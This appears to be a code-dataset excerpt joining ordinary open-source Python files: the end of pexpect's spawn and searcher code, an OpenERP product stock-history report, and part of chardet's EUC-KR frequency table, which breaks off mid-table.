self.__interact_copy(escape_character, input_filter, output_filter)
finally:
tty.tcsetattr(self.STDIN_FILENO, tty.TCSAFLUSH, mode)
def __interact_writen(self, fd, data):
'''This is used by the interact() method.
'''
while data != b'' and self.isalive():
n = os.write(fd, data)
data = data[n:]
def __interact_read(self, fd):
'''This is used by the interact() method.
'''
return os.read(fd, 1000)
def __interact_copy(self, escape_character=None,
input_filter=None, output_filter=None):
'''This is used by the interact() method.
'''
while self.isalive():
r, w, e = self.__select([self.child_fd, self.STDIN_FILENO], [], [])
if self.child_fd in r:
try:
data = self.__interact_read(self.child_fd)
except OSError as e:
# The subprocess may have closed before we get to reading it
if e.errno != errno.EIO:
raise
if output_filter:
data = output_filter(data)
if self.logfile is not None:
self.logfile.write(data)
self.logfile.flush()
os.write(self.STDOUT_FILENO, data)
if self.STDIN_FILENO in r:
data = self.__interact_read(self.STDIN_FILENO)
if input_filter:
data = input_filter(data)
i = data.rfind(escape_character)
if i != -1:
data = data[:i]
self.__interact_writen(self.child_fd, data)
break
self.__interact_writen(self.child_fd, data)
def __select(self, iwtd, owtd, ewtd, timeout=None):
'''This is a wrapper around select.select() that ignores signals. If
select.select raises a select.error exception and errno is an EINTR
error then it is ignored. Mainly this is used to ignore sigwinch
(terminal resize). '''
# if select() is interrupted by a signal (errno==EINTR) then
# we loop back and enter the select() again.
if timeout is not None:
end_time = time.time() + timeout
while True:
try:
return select.select(iwtd, owtd, ewtd, timeout)
except select.error:
err = sys.exc_info()[1]
if err.args[0] == errno.EINTR:
# if we loop back we have to subtract the
# amount of time we already waited.
if timeout is not None:
timeout = end_time - time.time()
if timeout < 0:
return([], [], [])
else:
# something else caused the select.error, so
# this actually is an exception.
raise
##############################################################################
# The following methods are no longer supported or allowed.
def setmaxread(self, maxread):
'''This method is no longer supported or allowed. I don't like getters
and setters without a good reason. '''
raise ExceptionPexpect('This method is no longer supported ' +
'or allowed. Just assign a value to the ' +
'maxread member variable.')
def setlog(self, fileobject):
'''This method is no longer supported or allowed.
'''
raise ExceptionPexpect('This method is no longer supported ' +
'or allowed. Just assign a value to the logfile ' +
'member variable.')
##############################################################################
# End of spawn class
##############################################################################
class spawnu(spawn):
"""Works like spawn, but accepts and returns unicode strings.
Extra parameters:
:param encoding: The encoding to use for communications (default: 'utf-8')
:param errors: How to handle encoding/decoding errors; one of 'strict'
(the default), 'ignore', or 'replace', as described
for :meth:`~bytes.decode` and :meth:`~str.encode`.
"""
if PY3:
string_type = str
allowed_string_types = (str, )
_chr = staticmethod(chr)
linesep = os.linesep
else:
string_type = unicode
allowed_string_types = (unicode, )
_chr = staticmethod(unichr)
linesep = os.linesep.decode('ascii')
# This can handle unicode in both Python 2 and 3
write_to_stdout = sys.stdout.write
def __init__(self, *args, **kwargs):
self.encoding = kwargs.pop('encoding', 'utf-8')
self.errors = kwargs.pop('errors', 'strict')
self._decoder = codecs.getincrementaldecoder(self.encoding)(errors=self.errors)
super(spawnu, self).__init__(*args, **kwargs)
@staticmethod
def _coerce_expect_string(s):
return s
@staticmethod
def _coerce_send_string(s):
return s
def _coerce_read_string(self, s):
return self._decoder.decode(s, final=False)
def _send(self, s):
return os.write(self.child_fd, s.encode(self.encoding, self.errors))
class searcher_string(object):
'''This is a plain string search helper for the spawn.expect_any() method.
This helper class is for speed. For more powerful regex patterns
see the helper class, searcher_re.
Attributes:
eof_index - index of EOF, or -1
timeout_index - index of TIMEOUT, or -1
After a successful match by the search() method the following attributes
are available:
start - index into the buffer, first byte of match
end - index into the buffer, first byte after match
match - the matching string itself
'''
def __init__(self, strings):
'''This creates an instance of searcher_string. This argument 'strings'
may be a list; a sequence of strings; or the EOF or TIMEOUT types. '''
self.eof_index = -1
self.timeout_index = -1
self._strings = []
for n, s in enumerate(strings):
if s is EOF:
self.eof_index = n
continue
if s is TIMEOUT:
self.timeout_index = n
continue
self._strings.append((n, s))
def __str__(self):
'''This returns a human-readable string that represents the state of
the object.'''
ss = [(ns[0], ' %d: "%s"' % ns) for ns in self._strings]
ss.append((-1, 'searcher_string:'))
if self.eof_index >= 0:
ss.append((self.eof_index, ' %d: EOF' % self.eof_index))
if self.timeout_index >= 0:
ss.append((self.timeout_index,
' %d: TIMEOUT' % self.timeout_index))
ss.sort()
ss = list(zip(*ss))[1]
return '\n'.join(ss)
def search(self, buffer, freshlen, searchwindowsize=None):
'''This searches 'buffer' for the first occurence of one of the search
strings. 'freshlen' must indicate the number of bytes at the end of
'buffer' which have not been searched before. It helps to avoid
searching the same, possibly big, buffer over and over again.
See class spawn for the 'searchwindowsize' argument.
If there is a match this returns the index of that string, and sets
'start', 'end' and 'match'. Otherwise, this returns -1. '''
first_match = None
# 'freshlen' helps a lot here. Further optimizations could
# possibly include:
#
# using something like the Boyer-Moore Fast String Searching
# Algorithm; pre-compiling the search through a list of
# strings into something that can scan the input once to
# search for all N strings; realize that if we search for
# ['bar', 'baz'] and the input is '...foo' we need not bother
# rescanning until we've read three more bytes.
#
# Sadly, I don't know enough about this interesting topic. /grahn
for index, s in self._strings:
if searchwindowsize is None:
# the match, if any, can only be in the fresh data,
# or at the very end of the old data
offset = -(freshlen + len(s))
else:
# better obey searchwindowsize
offset = -searchwindowsize
n = buffer.find(s, offset)
if n >= 0 and (first_match is None or n < first_match):
first_match = n
best_index, best_match = index, s
if first_match is None:
return -1
self.match = best_match
self.start = first_match
self.end = self.start + len(self.match)
return best_index
class searcher_re(object):
'''This is regular expression string search helper for the
spawn.expect_any() method. This helper class is for powerful
pattern matching. For speed, see the helper class, searcher_string.
Attributes:
eof_index - index of EOF, or -1
timeout_index - index of TIMEOUT, or -1
After a successful match by the search() method the following attributes
are available:
start - index into the buffer, first byte of match
end - index into the buffer, first byte after match
match - the re.match object returned by a succesful re.search
'''
def __init__(self, patterns):
'''This creates an instance that searches for 'patterns' Where
'patterns' may be a list or other sequence of compiled regular
expressions, or the EOF or TIMEOUT types.'''
self.eof_index = -1
self.timeout_index = -1
self._searches = []
for n, s in zip(list(range(len(patterns))), patterns):
if s is EOF:
self.eof_index = n
continue
if s is TIMEOUT:
self.timeout_index = n
continue
self._searches.append((n, s))
def __str__(self):
'''This returns a human-readable string that represents the state of
the object.'''
#ss = [(n, ' %d: re.compile("%s")' %
# (n, repr(s.pattern))) for n, s in self._searches]
ss = list()
for n, s in self._searches:
try:
ss.append((n, ' %d: re.compile("%s")' % (n, s.pattern)))
except UnicodeEncodeError:
# for test cases that display __str__ of searches, dont throw
# another exception just because stdout is ascii-only, using
# repr()
ss.append((n, ' %d: re.compile(%r)' % (n, s.pattern)))
ss.append((-1, 'searcher_re:'))
if self.eof_index >= 0:
ss.append((self.eof_index, ' %d: EOF' % self.eof_index))
if self.timeout_index >= 0:
ss.append((self.timeout_index, ' %d: TIMEOUT' %
self.timeout_index))
ss.sort()
ss = list(zip(*ss))[1]
return '\n'.join(ss)
def search(self, buffer, freshlen, searchwindowsize=None):
'''This searches 'buffer' for the first occurence of one of the regular
expressions. 'freshlen' must indicate the number of bytes at the end of
'buffer' which have not been searched before.
See class spawn for the 'searchwindowsize' argument.
If there is a match this returns the index of that string, and sets
'start', 'end' and 'match'. Otherwise, returns -1.'''
first_match = None
# 'freshlen' doesn't help here -- we cannot predict the
# length of a match, and the re module provides no help.
if searchwindowsize is None:
searchstart = 0
else:
searchstart = max(0, len(buffer) - searchwindowsize)
for index, s in self._searches:
match = s.search(buffer, searchstart)
if match is None:
continue
n = match.start()
if first_match is None or n < first_match:
first_match = n
the_match = match
best_index = index
if first_match is None:
return -1
self.start = first_match
self.match = the_match
self.end = self.match.end()
return best_index
def which(filename):
'''This takes a given filename; tries to find it in the environment path;
then checks if it is executable. This returns the full path to the filename
if found and executable. Otherwise this returns None.'''
# Special case where filename contains an explicit path.
if os.path.dirname(filename) != '':
if os.access(filename, os.X_OK):
return filename
if 'PATH' not in os.environ or os.environ['PATH'] == '':
p = os.defpath
else:
p = os.environ['PATH']
pathlist = p.split(os.pathsep)
for path in pathlist:
ff = os.path.join(path, filename)
if os.access(ff, os.X_OK):
return ff
return None
def split_command_line(command_line):
'''This splits a command line into a list of arguments. It splits arguments
on spaces, but handles embedded quotes, doublequotes, and escaped
characters. It's impossible to do this with a regular expression, so I
wrote a little state machine to parse the command line. '''
arg_list = []
arg = ''
# Constants to name the states we can be in.
state_basic = 0
state_esc = 1
state_singlequote = 2
state_doublequote = 3
# The state when consuming whitespace between commands.
state_whitespace = 4
state = state_basic
for c in command_line:
if state == state_basic or state == state_whitespace:
if c == '\\':
# Escape the next character
state = state_esc
elif c == r"'":
# Handle single quote
state = state_singlequote
elif c == r'"':
# Handle double quote
state = state_doublequote
elif c.isspace():
# Add arg to arg_list if we aren't in the middle of whitespace.
if state == state_whitespace:
# Do nothing.
None
else:
arg_list.append(arg)
arg = ''
state = state_whitespace
else:
arg = arg + c
state = state_basic
elif state == state_esc:
arg = arg + c
state = state_basic
elif state == state_singlequote:
if c == r"'":
state = state_basic
else:
arg = arg + c
elif state == state_doublequote:
if c == r'"':
state = state_basic
else:
arg = arg + c
if arg != '':
arg_list.append(arg)
return arg_list
# vi:set sr et ts=4 sw=4 ft=python :
| mit |
bwrsandman/OpenUpgrade | addons/stock/report/product_stock.py | 376 | 4868 | # -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2004-2010 Tiny SPRL (<http://tiny.be>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
from datetime import datetime
from dateutil.relativedelta import relativedelta
import openerp
from openerp import osv
import time
from openerp.report.interface import report_int
from openerp.report.render import render
import stock_graph
import StringIO
import unicodedata
class external_pdf(render):
def __init__(self, pdf):
render.__init__(self)
self.pdf = pdf
self.output_type='pdf'
def _render(self):
return self.pdf
class report_stock(report_int):
def create(self, cr, uid, ids, datas, context=None):
if context is None:
context = {}
registry = openerp.registry(cr.dbname)
product_ids = ids
if 'location_id' in context:
location_id = context['location_id']
else:
warehouse_id = registry['stock.warehouse'].search(cr, uid, [])[0]
location_id = registry['stock.warehouse'].browse(cr, uid, warehouse_id).lot_stock_id.id
loc_ids = registry['stock.location'].search(cr, uid, [('location_id','child_of',[location_id])])
now = time.strftime('%Y-%m-%d')
dt_from = now
dt_to = now
names = dict(registry['product.product'].name_get(cr, uid, product_ids))
for name in names:
names[name] = names[name].encode('utf8')
products = {}
ctx = context.copy()
ctx['location_id'] = loc_ids
prods = registry['product.product']._product_available(cr, uid, product_ids, context=ctx)
for prod in prods.keys():
products[prod] = [(now, prods[prod]['qty_available'])]
prods[prod] = 0
if not loc_ids or not product_ids:
return (False, 'pdf')
cr.execute("select sum(r.product_qty * u.factor), r.date, r.product_id "
"from stock_move r left join product_uom u on (r.product_uom=u.id) "
"where state IN %s"
"and location_id IN %s"
"and product_id IN %s"
"group by date,product_id",(('confirmed','assigned','waiting'),tuple(loc_ids) ,tuple(product_ids),))
for (qty, dt, prod_id) in cr.fetchall():
if dt<=dt_from:
dt= (datetime.now() + relativedelta(days=1)).strftime('%Y-%m-%d')
else:
dt = dt[:10]
products.setdefault(prod_id, [])
products[prod_id].append((dt,-qty))
cr.execute("select sum(r.product_qty * u.factor), r.date, r.product_id "
"from stock_move r left join product_uom u on (r.product_uom=u.id) "
"where state IN %s"
"and location_dest_id IN %s"
"and product_id IN %s"
"group by date,product_id",(('confirmed','assigned','waiting'),tuple(loc_ids) ,tuple(product_ids),))
for (qty, dt, prod_id) in cr.fetchall():
if dt<=dt_from:
dt= (datetime.now() + relativedelta(days=1)).strftime('%Y-%m-%d')
else:
dt = dt[:10]
products.setdefault(prod_id, [])
products[prod_id].append((dt,qty))
dt = dt_from
qty = 0
io = StringIO.StringIO()
gt = stock_graph.stock_graph(io)
for prod_id in products:
prod_name = names.get(prod_id,'Unknown')
if isinstance(prod_name, str):
prod_name = prod_name.decode('utf-8')
prod_name = unicodedata.normalize('NFKD',prod_name)
prod_name = prod_name.encode('ascii','replace')
gt.add(prod_id, prod_name, products[prod_id])
gt.draw()
gt.close()
self.obj = external_pdf(io.getvalue())
self.obj.render()
return (self.obj.pdf, 'pdf')
report_stock('report.stock.product.history')
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
| agpl-3.0 |
mhotwagner/abackend | abackend-env/lib/python3.5/site-packages/pip/_vendor/requests/packages/chardet/euckrfreq.py | 3121 | 45978 | ######################## BEGIN LICENSE BLOCK ########################
# The Original Code is Mozilla Communicator client code.
#
# The Initial Developer of the Original Code is
# Netscape Communications Corporation.
# Portions created by the Initial Developer are Copyright (C) 1998
# the Initial Developer. All Rights Reserved.
#
# Contributor(s):
# Mark Pilgrim - port to Python
#
# This library is free software; you can redistribute it and/or
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation; either
# version 2.1 of the License, or (at your option) any later version.
#
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this library; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA
# 02110-1301 USA
######################### END LICENSE BLOCK #########################
# Sampling from about 20M text materials include literature and computer technology
# 128 --> 0.79
# 256 --> 0.92
# 512 --> 0.986
# 1024 --> 0.99944
# 2048 --> 0.99999
#
# Idea Distribution Ratio = 0.98653 / (1-0.98653) = 73.24
# Random Distribution Ration = 512 / (2350-512) = 0.279.
#
# Typical Distribution Ratio
EUCKR_TYPICAL_DISTRIBUTION_RATIO = 6.0
EUCKR_TABLE_SIZE = 2352
# Char to FreqOrder table ,
EUCKRCharToFreqOrder = ( \
13, 130, 120,1396, 481,1719,1720, 328, 609, 212,1721, 707, 400, 299,1722, 87,
1397,1723, 104, 536,1117,1203,1724,1267, 685,1268, 508,1725,1726,1727,1728,1398,
1399,1729,1730,1731, 141, 621, 326,1057, 368,1732, 267, 488, 20,1733,1269,1734,
945,1400,1735, 47, 904,1270,1736,1737, 773, 248,1738, 409, 313, 786, 429,1739,
116, 987, 813,1401, 683, 75,1204, 145,1740,1741,1742,1743, 16, 847, 667, 622,
708,1744,1745,1746, 966, 787, 304, 129,1747, 60, 820, 123, 676,1748,1749,1750,
1751, 617,1752, 626,1753,1754,1755,1756, 653,1757,1758,1759,1760,1761,1762, 856,
344,1763,1764,1765,1766, 89, 401, 418, 806, 905, 848,1767,1768,1769, 946,1205,
709,1770,1118,1771, 241,1772,1773,1774,1271,1775, 569,1776, 999,1777,1778,1779,
1780, 337, 751,1058, 28, 628, 254,1781, 177, 906, 270, 349, 891,1079,1782, 19,
1783, 379,1784, 315,1785, 629, 754,1402, 559,1786, 636, 203,1206,1787, 710, 567,
1788, 935, 814,1789,1790,1207, 766, 528,1791,1792,1208,1793,1794,1795,1796,1797,
1403,1798,1799, 533,1059,1404,1405,1156,1406, 936, 884,1080,1800, 351,1801,1802,
1803,1804,1805, 801,1806,1807,1808,1119,1809,1157, 714, 474,1407,1810, 298, 899,
885,1811,1120, 802,1158,1812, 892,1813,1814,1408, 659,1815,1816,1121,1817,1818,
1819,1820,1821,1822, 319,1823, 594, 545,1824, 815, 937,1209,1825,1826, 573,1409,
1022,1827,1210,1828,1829,1830,1831,1832,1833, 556, 722, 807,1122,1060,1834, 697,
1835, 900, 557, 715,1836,1410, 540,1411, 752,1159, 294, 597,1211, 976, 803, 770,
1412,1837,1838, 39, 794,1413, 358,1839, 371, 925,1840, 453, 661, 788, 531, 723,
544,1023,1081, 869, 91,1841, 392, 430, 790, 602,1414, 677,1082, 457,1415,1416,
1842,1843, 475, 327,1024,1417, 795, 121,1844, 733, 403,1418,1845,1846,1847, 300,
119, 711,1212, 627,1848,1272, 207,1849,1850, 796,1213, 382,1851, 519,1852,1083,
893,1853,1854,1855, 367, 809, 487, 671,1856, 663,1857,1858, 956, 471, 306, 857,
1859,1860,1160,1084,1861,1862,1863,1864,1865,1061,1866,1867,1868,1869,1870,1871,
282, 96, 574,1872, 502,1085,1873,1214,1874, 907,1875,1876, 827, 977,1419,1420,
1421, 268,1877,1422,1878,1879,1880, 308,1881, 2, 537,1882,1883,1215,1884,1885,
127, 791,1886,1273,1423,1887, 34, 336, 404, 643,1888, 571, 654, 894, 840,1889,
0, 886,1274, 122, 575, 260, 908, 938,1890,1275, 410, 316,1891,1892, 100,1893,
1894,1123, 48,1161,1124,1025,1895, 633, 901,1276,1896,1897, 115, 816,1898, 317,
1899, 694,1900, 909, 734,1424, 572, 866,1425, 691, 85, 524,1010, 543, 394, 841,
1901,1902,1903,1026,1904,1905,1906,1907,1908,1909, 30, 451, 651, 988, 310,1910,
1911,1426, 810,1216, 93,1912,1913,1277,1217,1914, 858, 759, 45, 58, 181, 610,
269,1915,1916, 131,1062, 551, 443,1000, 821,1427, 957, 895,1086,1917,1918, 375,
1919, 359,1920, 687,1921, 822,1922, 293,1923,1924, 40, 662, 118, 692, 29, 939,
887, 640, 482, 174,1925, 69,1162, 728,1428, 910,1926,1278,1218,1279, 386, 870,
217, 854,1163, 823,1927,1928,1929,1930, 834,1931, 78,1932, 859,1933,1063,1934,
1935,1936,1937, 438,1164, 208, 595,1938,1939,1940,1941,1219,1125,1942, 280, 888,
1429,1430,1220,1431,1943,1944,1945,1946,1947,1280, 150, 510,1432,1948,1949,1950,
1951,1952,1953,1954,1011,1087,1955,1433,1043,1956, 881,1957, 614, 958,1064,1065,
1221,1958, 638,1001, 860, 967, 896,1434, 989, 492, 553,1281,1165,1959,1282,1002,
1283,1222,1960,1961,1962,1963, 36, 383, 228, 753, 247, 454,1964, 876, 678,1965,
1966,1284, 126, 464, 490, 835, 136, 672, 529, 940,1088,1435, 473,1967,1968, 467,
50, 390, 227, 587, 279, 378, 598, 792, 968, 240, 151, 160, 849, 882,1126,1285,
639,1044, 133, 140, 288, 360, 811, 563,1027, 561, 142, 523,1969,1970,1971, 7,
103, 296, 439, 407, 506, 634, 990,1972,1973,1974,1975, 645,1976,1977,1978,1979,
1980,1981, 236,1982,1436,1983,1984,1089, 192, 828, 618, 518,1166, 333,1127,1985,
818,1223,1986,1987,1988,1989,1990,1991,1992,1993, 342,1128,1286, 746, 842,1994,
1995, 560, 223,1287, 98, 8, 189, 650, 978,1288,1996,1437,1997, 17, 345, 250,
423, 277, 234, 512, 226, 97, 289, 42, 167,1998, 201,1999,2000, 843, 836, 824,
532, 338, 783,1090, 182, 576, 436,1438,1439, 527, 500,2001, 947, 889,2002,2003,
2004,2005, 262, 600, 314, 447,2006, 547,2007, 693, 738,1129,2008, 71,1440, 745,
619, 688,2009, 829,2010,2011, 147,2012, 33, 948,2013,2014, 74, 224,2015, 61,
191, 918, 399, 637,2016,1028,1130, 257, 902,2017,2018,2019,2020,2021,2022,2023,
2024,2025,2026, 837,2027,2028,2029,2030, 179, 874, 591, 52, 724, 246,2031,2032,
2033,2034,1167, 969,2035,1289, 630, 605, 911,1091,1168,2036,2037,2038,1441, 912,
2039, 623,2040,2041, 253,1169,1290,2042,1442, 146, 620, 611, 577, 433,2043,1224,
719,1170, 959, 440, 437, 534, 84, 388, 480,1131, 159, 220, 198, 679,2044,1012,
819,1066,1443, 113,1225, 194, 318,1003,1029,2045,2046,2047,2048,1067,2049,2050,
2051,2052,2053, 59, 913, 112,2054, 632,2055, 455, 144, 739,1291,2056, 273, 681,
499,2057, 448,2058,2059, 760,2060,2061, 970, 384, 169, 245,1132,2062,2063, 414,
1444,2064,2065, 41, 235,2066, 157, 252, 877, 568, 919, 789, 580,2067, 725,2068,
2069,1292,2070,2071,1445,2072,1446,2073,2074, 55, 588, 66,1447, 271,1092,2075,
1226,2076, 960,1013, 372,2077,2078,2079,2080,2081,1293,2082,2083,2084,2085, 850,
2086,2087,2088,2089,2090, 186,2091,1068, 180,2092,2093,2094, 109,1227, 522, 606,
2095, 867,1448,1093, 991,1171, 926, 353,1133,2096, 581,2097,2098,2099,1294,1449,
1450,2100, 596,1172,1014,1228,2101,1451,1295,1173,1229,2102,2103,1296,1134,1452,
949,1135,2104,2105,1094,1453,1454,1455,2106,1095,2107,2108,2109,2110,2111,2112,
2113,2114,2115,2116,2117, 804,2118,2119,1230,1231, 805,1456, 405,1136,2120,2121,
2122,2123,2124, 720, 701,1297, 992,1457, 927,1004,2125,2126,2127,2128,2129,2130,
22, 417,2131, 303,2132, 385,2133, 971, 520, 513,2134,1174, 73,1096, 231, 274,
962,1458, 673,2135,1459,2136, 152,1137,2137,2138,2139,2140,1005,1138,1460,1139,
2141,2142,2143,2144, 11, 374, 844,2145, 154,1232, 46,1461,2146, 838, 830, 721,
1233, 106,2147, 90, 428, 462, 578, 566,1175, 352,2148,2149, 538,1234, 124,1298,
2150,1462, 761, 565,2151, 686,2152, 649,2153, 72, 173,2154, 460, 415,2155,1463,
2156,1235, 305,2157,2158,2159,2160,2161,2162, 579,2163,2164,2165,2166,2167, 747,
2168,2169,2170,2171,1464, 669,2172,2173,2174,2175,2176,1465,2177, 23, 530, 285,
2178, 335, 729,2179, 397,2180,2181,2182,1030,2183,2184, 698,2185,2186, 325,2187,
2188, 369,2189, 799,1097,1015, 348,2190,1069, 680,2191, 851,1466,2192,2193, 10,
2194, 613, 424,2195, 979, 108, 449, 589, 27, 172, 81,1031, 80, 774, 281, 350,
1032, 525, 301, 582,1176,2196, 674,1045,2197,2198,1467, 730, 762,2199,2200,2201,
2202,1468,2203, 993,2204,2205, 266,1070, 963,1140,2206,2207,2208, 664,1098, 972,
2209,2210,2211,1177,1469,1470, 871,2212,2213,2214,2215,2216,1471,2217,2218,2219,
2220,2221,2222,2223,2224,2225,2226,2227,1472,1236,2228,2229,2230,2231,2232,2233,
2234,2235,1299,2236,2237, 200,2238, 477, 373,2239,2240, 731, 825, 777,2241,2242,
2243, 521, 486, 548,2244,2245,2246,1473,1300, 53, 549, 137, 875, 76, 158,2247,
1301,1474, 469, 396,1016, 278, 712,2248, 321, 442, 503, 767, 744, 941,1237,1178,
1475,2249, 82, 178,1141,1179, 973,2250,1302,2251, 297,2252,2253, 570,2254,2255,
2256, 18, 450, 206,2257, 290, 292,1142,2258, 511, 162, 99, 346, 164, 735,2259,
1476,1477, 4, 554, 343, 798,1099,2260,1100,2261, 43, 171,1303, 139, 215,2262,
2263, 717, 775,2264,1033, 322, 216,2265, 831,2266, 149,2267,1304,2268,2269, 702,
1238, 135, 845, 347, 309,2270, 484,2271, 878, 655, 238,1006,1478,2272, 67,2273,
295,2274,2275, 461,2276, 478, 942, 412,2277,1034,2278,2279,2280, 265,2281, 541,
2282,2283,2284,2285,2286, 70, 852,1071,2287,2288,2289,2290, 21, 56, 509, 117,
432,2291,2292, 331, 980, 552,1101, 148, 284, 105, 393,1180,1239, 755,2293, 187,
2294,1046,1479,2295, 340,2296, 63,1047, 230,2297,2298,1305, 763,1306, 101, 800,
808, 494,2299,2300,2301, 903,2302, 37,1072, 14, 5,2303, 79, 675,2304, 312,
2305,2306,2307,2308,2309,1480, 6,1307,2310,2311,2312, 1, 470, 35, 24, 229,
2313, 695, 210, 86, 778, 15, 784, 592, 779, 32, 77, 855, 964,2314, 259,2315,
501, 380,2316,2317, 83, 981, 153, 689,1308,1481,1482,1483,2318,2319, 716,1484,
2320,2321,2322,2323,2324,2325,1485,2326,2327, 128, 57, 68, 261,1048, 211, 170,
1240, 31,2328, 51, 435, 742,2329,2330,2331, 635,2332, 264, 456,2333,2334,2335,
425,2336,1486, 143, 507, 263, 943,2337, 363, 920,1487, 256,1488,1102, 243, 601,
1489,2338,2339,2340,2341,2342,2343,2344, 861,2345,2346,2347,2348,2349,2350, 395,
2351,1490,1491, 62, 535, 166, 225,2352,2353, 668, 419,1241, 138, 604, 928,2354,
1181,2355,1492,1493,2356,2357,2358,1143,2359, 696,2360, 387, 307,1309, 682, 476,
2361,2362, 332, 12, 222, 156,2363, 232,2364, 641, 276, 656, 517,1494,1495,1035,
416, 736,1496,2365,1017, 586,2366,2367,2368,1497,2369, 242,2370,2371,2372,1498,
2373, 965, 713,2374,2375,2376,2377, 740, 982,1499, 944,1500,1007,2378,2379,1310,
1501,2380,2381,2382, 785, 329,2383,2384,1502,2385,2386,2387, 932,2388,1503,2389,
2390,2391,2392,1242,2393,2394,2395,2396,2397, 994, 950,2398,2399,2400,2401,1504,
1311,2402,2403,2404,2405,1049, 749,2406,2407, 853, 718,1144,1312,2408,1182,1505,
2409,2410, 255, 516, 479, 564, 550, 214,1506,1507,1313, 413, 239, 444, 339,1145,
1036,1508,1509,1314,1037,1510,1315,2411,1511,2412,2413,2414, 176, 703, 497, 624,
593, 921, 302,2415, 341, 165,1103,1512,2416,1513,2417,2418,2419, 376,2420, 700,
2421,2422,2423, 258, 768,1316,2424,1183,2425, 995, 608,2426,2427,2428,2429, 221,
2430,2431,2432,2433,2434,2435,2436,2437, 195, 323, 726, 188, 897, 983,1317, 377,
644,1050, 879,2438, 452,2439,2440,2441,2442,2443,2444, 914,2445,2446,2447,2448,
915, 489,2449,1514,1184,2450,2451, 515, 64, 427, 495,2452, 583,2453, 483, 485,
1038, 562, 213,1515, 748, 666,2454,2455,2456,2457, 334,2458, 780, 996,1008, 705,
1243,2459,2460,2461,2462,2463, 114,2464, 493,1146, 366, 163,1516, 961,1104,2465,
291,2466,1318,1105,2467,1517, 365,2468, 355, 951,1244,2469,1319,2470, 631,2471,
2472, 218,1320, 364, 320, 756,1518,1519,1321,1520,1322,2473,2474,2475,2476, 997,
2477,2478,2479,2480, 665,1185,2481, 916,1521,2482,2483,2484, 584, 684,2485,2486,
797,2487,1051,1186,2488,2489,2490,1522,2491,2492, 370,2493,1039,1187, 65,2494,
434, 205, 463,1188,2495, 125, 812, 391, 402, 826, 699, 286, 398, 155, 781, 771,
585,2496, 590, 505,1073,2497, 599, 244, 219, 917,1018, 952, 646,1523,2498,1323,
2499,2500, 49, 984, 354, 741,2501, 625,2502,1324,2503,1019, 190, 357, 757, 491,
95, 782, 868,2504,2505,2506,2507,2508,2509, 134,1524,1074, 422,1525, 898,2510,
161,2511,2512,2513,2514, 769,2515,1526,2516,2517, 411,1325,2518, 472,1527,2519,
2520,2521,2522,2523,2524, 985,2525,2526,2527,2528,2529,2530, 764,2531,1245,2532,
2533, 25, 204, 311,2534, 496,2535,1052,2536,2537,2538,2539,2540,2541,2542, 199,
704, 504, 468, 758, 657,1528, 196, 44, 839,1246, 272, 750,2543, 765, 862,2544,
2545,1326,2546, 132, 615, 933,2547, 732,2548,2549,2550,1189,1529,2551, 283,1247,
1053, 607, 929,2552,2553,2554, 930, 183, 872, 616,1040,1147,2555,1148,1020, 441,
249,1075,2556,2557,2558, 466, 743,2559,2560,2561, 92, 514, 426, 420, 526,2562,
2563,2564,2565,2566,2567,2568, 185,2569,2570,2571,2572, 776,1530, 658,2573, 362,
2574, 361, 922,1076, 793,2575,2576,2577,2578,2579,2580,1531, 251,2581,2582,2583,
2584,1532, 54, 612, 237,1327,2585,2586, 275, 408, 647, 111,2587,1533,1106, 465,
3, 458, 9, 38,2588, 107, 110, 890, 209, 26, 737, 498,2589,1534,2590, 431,
202, 88,1535, 356, 287,1107, 660,1149,2591, 381,1536, 986,1150, 445,1248,1151,
974,2592,2593, 846,2594, 446, 953, 184,1249,1250, 727,2595, 923, 193, 883,2596,
2597,2598, 102, 324, 539, 817,2599, 421,1041,2600, 832,2601, 94, 175, 197, 406,
2602, 459,2603,2604,2605,2606,2607, 330, 555,2608,2609,2610, 706,1108, 389,2611,
2612,2613,2614, 233,2615, 833, 558, 931, 954,1251,2616,2617,1537, 546,2618,2619,
1009,2620,2621,2622,1538, 690,1328,2623, 955,2624,1539,2625,2626, 772,2627,2628,
2629,2630,2631, 924, 648, 863, 603,2632,2633, 934,1540, 864, 865,2634, 642,1042,
670,1190,2635,2636,2637,2638, 168,2639, 652, 873, 542,1054,1541,2640,2641,2642, # 512, 256
#Everything below is of no interest for detection purpose
2643,2644,2645,2646,2647,2648,2649,2650,2651,2652,2653,2654,2655,2656,2657,2658,
2659,2660,2661,2662,2663,2664,2665,2666,2667,2668,2669,2670,2671,2672,2673,2674,
2675,2676,2677,2678,2679,2680,2681,2682,2683,2684,2685,2686,2687,2688,2689,2690,
2691,2692,2693,2694,2695,2696,2697,2698,2699,1542, 880,2700,2701,2702,2703,2704,
2705,2706,2707,2708,2709,2710,2711,2712,2713,2714,2715,2716,2717,2718,2719,2720,
2721,2722,2723,2724,2725,1543,2726,2727,2728,2729,2730,2731,2732,1544,2733,2734,
2735,2736,2737,2738,2739,2740,2741,2742,2743,2744,2745,2746,2747,2748,2749,2750,
2751,2752,2753,2754,1545,2755,2756,2757,2758,2759,2760,2761,2762,2763,2764,2765,
2766,1546,2767,1547,2768,2769,2770,2771,2772,2773,2774,2775,2776,2777,2778,2779,
2780,2781,2782,2783,2784,2785,2786,1548,2787,2788,2789,1109,2790,2791,2792,2793,
2794,2795,2796,2797,2798,2799,2800,2801,2802,2803,2804,2805,2806,2807,2808,2809,
2810,2811,2812,1329,2813,2814,2815,2816,2817,2818,2819,2820,2821,2822,2823,2824,
2825,2826,2827,2828,2829,2830,2831,2832,2833,2834,2835,2836,2837,2838,2839,2840,
2841,2842,2843,2844,2845,2846,2847,2848,2849,2850,2851,2852,2853,2854,2855,2856,
